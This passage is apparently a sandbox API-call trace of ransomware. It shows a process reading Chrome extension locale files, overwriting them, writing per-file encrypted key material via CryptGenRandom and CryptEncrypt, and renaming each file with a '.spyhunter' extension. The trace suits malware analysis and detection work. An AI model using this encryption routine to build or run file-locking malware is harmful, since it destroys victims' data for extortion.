data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\zh_cn\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x17c [0134.342] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\zh_CN\\messages.json") returned 158 [0134.342] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0134.342] GetProcessHeap () returned 0x2c0000 [0134.343] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0134.343] ReadFile (in: hFile=0x17c, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248f65c, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x248f65c*=0xce, lpOverlapped=0x0) returned 1 [0134.343] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0xffffff32, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0134.344] WriteFile (in: hFile=0x17c, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0xce, lpNumberOfBytesWritten=0x248f65c, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x248f65c*=0xce, lpOverlapped=0x0) returned 1 [0134.344] GetProcessHeap () returned 0x2c0000 [0134.344] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0134.344] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0134.344] WriteFile (in: hFile=0x17c, lpBuffer=0x248f69c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248f65c, lpOverlapped=0x0 | out: lpBuffer=0x248f69c*, lpNumberOfBytesWritten=0x248f65c*=0x4, lpOverlapped=0x0) returned 1 [0134.344] WriteFile (in: hFile=0x17c, lpBuffer=0x31f020*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248f65c, lpOverlapped=0x0 | out: lpBuffer=0x31f020*, lpNumberOfBytesWritten=0x248f65c*=0x30, lpOverlapped=0x0) returned 1 [0134.344] CloseHandle (hObject=0x17c) returned 1 [0134.350] GetProcessHeap () returned 0x2c0000 [0134.350] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2f6eda0 [0134.350] wnsprintfW (in: pszDest=0x2f6eda0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\zh_CN\\messages.json.spyhunter") returned 168 [0134.350] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\zh_CN\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\zh_cn\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\zh_CN\\messages.json.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\zh_cn\\messages.json.spyhunter")) returned 1 [0134.351] GetProcessHeap () returned 0x2c0000 [0134.351] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f6eda0 | out: hHeap=0x2c0000) returned 1 [0134.351] GetProcessHeap () returned 0x2c0000 [0134.351] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0134.351] GetProcessHeap () returned 0x2c0000 [0134.351] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f804f8 | out: hHeap=0x2c0000) returned 1 [0134.352] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248f698 | out: pbBuffer=0x248f698) returned 1 [0134.352] GetProcessHeap () returned 0x2c0000 [0134.352] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0134.352] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x248f690*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x248f690*=0x30) returned 1 [0134.352] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\vi\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\vi\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x17c [0134.353] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\vi\\messages.json") returned 155 [0134.353] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0134.353] GetProcessHeap () returned 0x2c0000 [0134.353] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0134.353] ReadFile (in: hFile=0x17c, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248f654, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x248f654*=0xe1, lpOverlapped=0x0) returned 1 [0134.354] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0xffffff1f, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0134.354] WriteFile (in: hFile=0x17c, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0xe1, lpNumberOfBytesWritten=0x248f654, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x248f654*=0xe1, lpOverlapped=0x0) returned 1 [0134.354] GetProcessHeap () returned 0x2c0000 [0134.354] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0134.354] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0134.354] WriteFile (in: hFile=0x17c, lpBuffer=0x248f694*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248f654, lpOverlapped=0x0 | out: lpBuffer=0x248f694*, lpNumberOfBytesWritten=0x248f654*=0x4, lpOverlapped=0x0) returned 1 [0134.354] WriteFile (in: hFile=0x17c, lpBuffer=0x31f020*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248f654, lpOverlapped=0x0 | out: lpBuffer=0x31f020*, lpNumberOfBytesWritten=0x248f654*=0x30, lpOverlapped=0x0) returned 1 [0134.354] CloseHandle (hObject=0x17c) returned 1 [0134.354] GetProcessHeap () returned 0x2c0000 [0134.354] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2f6eda0 [0134.354] wnsprintfW (in: pszDest=0x2f6eda0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\vi\\messages.json.spyhunter") returned 165 [0134.354] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\vi\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\vi\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\vi\\messages.json.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\vi\\messages.json.spyhunter")) returned 1 [0134.355] GetProcessHeap () returned 0x2c0000 [0134.355] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f6eda0 | out: hHeap=0x2c0000) returned 1 [0134.355] GetProcessHeap () returned 0x2c0000 [0134.355] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0134.355] GetProcessHeap () returned 0x2c0000 [0134.355] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f801e8 | out: hHeap=0x2c0000) returned 1 [0134.356] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248f690 | out: pbBuffer=0x248f690) returned 1 [0134.356] GetProcessHeap () returned 0x2c0000 [0134.356] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0134.356] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x248f688*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x248f688*=0x30) returned 1 [0134.356] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\uk\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\uk\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x17c [0134.357] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\uk\\messages.json") returned 155 [0134.357] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0134.357] GetProcessHeap () returned 0x2c0000 [0134.357] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0134.357] ReadFile (in: hFile=0x17c, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248f64c, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x248f64c*=0x108, lpOverlapped=0x0) returned 1 [0134.357] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0xfffffef8, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0134.358] WriteFile (in: hFile=0x17c, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x108, lpNumberOfBytesWritten=0x248f64c, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x248f64c*=0x108, lpOverlapped=0x0) returned 1 [0134.358] GetProcessHeap () returned 0x2c0000 [0134.358] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0134.358] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0134.358] WriteFile (in: hFile=0x17c, lpBuffer=0x248f68c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248f64c, lpOverlapped=0x0 | out: lpBuffer=0x248f68c*, lpNumberOfBytesWritten=0x248f64c*=0x4, lpOverlapped=0x0) returned 1 [0134.358] WriteFile (in: hFile=0x17c, lpBuffer=0x31f020*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248f64c, lpOverlapped=0x0 | out: lpBuffer=0x31f020*, lpNumberOfBytesWritten=0x248f64c*=0x30, lpOverlapped=0x0) returned 1 [0134.358] CloseHandle (hObject=0x17c) returned 1 [0134.358] GetProcessHeap () returned 0x2c0000 [0134.358] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2f6eda0 [0134.358] wnsprintfW (in: pszDest=0x2f6eda0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\uk\\messages.json.spyhunter") returned 165 [0134.358] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\uk\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\uk\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\uk\\messages.json.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\uk\\messages.json.spyhunter")) returned 1 [0134.359] GetProcessHeap () returned 0x2c0000 [0134.359] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f6eda0 | out: hHeap=0x2c0000) returned 1 [0134.359] GetProcessHeap () returned 0x2c0000 [0134.359] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0134.359] GetProcessHeap () returned 0x2c0000 [0134.359] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f7fed8 | out: hHeap=0x2c0000) returned 1 [0134.360] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248f688 | out: pbBuffer=0x248f688) returned 1 [0134.360] GetProcessHeap () returned 0x2c0000 [0134.360] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0134.360] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x248f680*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x248f680*=0x30) returned 1 [0134.360] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\tr\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\tr\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x17c [0134.361] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\tr\\messages.json") returned 155 [0134.361] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0134.361] GetProcessHeap () returned 0x2c0000 [0134.361] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0134.361] ReadFile (in: hFile=0x17c, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248f644, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x248f644*=0xe3, lpOverlapped=0x0) returned 1 [0134.362] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0xffffff1d, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0134.362] WriteFile (in: hFile=0x17c, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0xe3, lpNumberOfBytesWritten=0x248f644, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x248f644*=0xe3, lpOverlapped=0x0) returned 1 [0134.362] GetProcessHeap () returned 0x2c0000 [0134.362] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0134.362] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0134.362] WriteFile (in: hFile=0x17c, lpBuffer=0x248f684*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248f644, lpOverlapped=0x0 | out: lpBuffer=0x248f684*, lpNumberOfBytesWritten=0x248f644*=0x4, lpOverlapped=0x0) returned 1 [0134.362] WriteFile (in: hFile=0x17c, lpBuffer=0x31f020*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248f644, lpOverlapped=0x0 | out: lpBuffer=0x31f020*, lpNumberOfBytesWritten=0x248f644*=0x30, lpOverlapped=0x0) returned 1 [0134.362] CloseHandle (hObject=0x17c) returned 1 [0134.362] GetProcessHeap () returned 0x2c0000 [0134.362] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2f6eda0 [0134.362] wnsprintfW (in: pszDest=0x2f6eda0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\tr\\messages.json.spyhunter") returned 165 [0134.362] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\tr\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\tr\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\tr\\messages.json.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\tr\\messages.json.spyhunter")) returned 1 [0134.363] GetProcessHeap () returned 0x2c0000 [0134.363] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f6eda0 | out: hHeap=0x2c0000) returned 1 [0134.363] GetProcessHeap () returned 0x2c0000 [0134.363] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0134.363] GetProcessHeap () returned 0x2c0000 [0134.363] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f7fbc8 | out: hHeap=0x2c0000) returned 1 [0134.364] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248f680 | out: pbBuffer=0x248f680) returned 1 [0134.364] GetProcessHeap () returned 0x2c0000 [0134.364] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0134.364] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x248f678*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x248f678*=0x30) returned 1 [0134.364] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\th\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\th\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x17c [0134.365] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\th\\messages.json") returned 155 [0134.365] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0134.365] GetProcessHeap () returned 0x2c0000 [0134.365] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0134.365] ReadFile (in: hFile=0x17c, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248f63c, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x248f63c*=0xfe, lpOverlapped=0x0) returned 1 [0134.366] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0xffffff02, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0134.366] WriteFile (in: hFile=0x17c, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0xfe, lpNumberOfBytesWritten=0x248f63c, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x248f63c*=0xfe, lpOverlapped=0x0) returned 1 [0134.366] GetProcessHeap () returned 0x2c0000 [0134.366] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0134.366] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0134.366] WriteFile (in: hFile=0x17c, lpBuffer=0x248f67c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248f63c, lpOverlapped=0x0 | out: lpBuffer=0x248f67c*, lpNumberOfBytesWritten=0x248f63c*=0x4, lpOverlapped=0x0) returned 1 [0134.366] WriteFile (in: hFile=0x17c, lpBuffer=0x31f020*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248f63c, lpOverlapped=0x0 | out: lpBuffer=0x31f020*, lpNumberOfBytesWritten=0x248f63c*=0x30, lpOverlapped=0x0) returned 1 [0134.366] CloseHandle (hObject=0x17c) returned 1 [0134.366] GetProcessHeap () returned 0x2c0000 [0134.366] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2f6eda0 [0134.366] wnsprintfW (in: pszDest=0x2f6eda0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\th\\messages.json.spyhunter") returned 165 [0134.367] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\th\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\th\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\th\\messages.json.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\th\\messages.json.spyhunter")) returned 1 [0134.367] GetProcessHeap () returned 0x2c0000 [0134.367] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f6eda0 | out: hHeap=0x2c0000) returned 1 [0134.367] GetProcessHeap () returned 0x2c0000 [0134.367] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0134.367] GetProcessHeap () returned 0x2c0000 [0134.367] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f7f8b8 | out: hHeap=0x2c0000) returned 1 [0134.368] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248f678 | out: pbBuffer=0x248f678) returned 1 [0134.368] GetProcessHeap () returned 0x2c0000 [0134.368] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0134.368] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x248f670*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x248f670*=0x30) returned 1 [0134.368] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\sv\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\sv\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x17c [0134.369] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\sv\\messages.json") returned 155 [0134.369] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0134.369] GetProcessHeap () returned 0x2c0000 [0134.369] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0134.369] ReadFile (in: hFile=0x17c, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248f634, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x248f634*=0xd6, lpOverlapped=0x0) returned 1 [0134.370] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0xffffff2a, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0134.370] WriteFile (in: hFile=0x17c, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0xd6, lpNumberOfBytesWritten=0x248f634, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x248f634*=0xd6, lpOverlapped=0x0) returned 1 [0134.370] GetProcessHeap () returned 0x2c0000 [0134.370] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0134.370] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0134.370] WriteFile (in: hFile=0x17c, lpBuffer=0x248f674*, nNumberOfBytesToWrite=0x4, 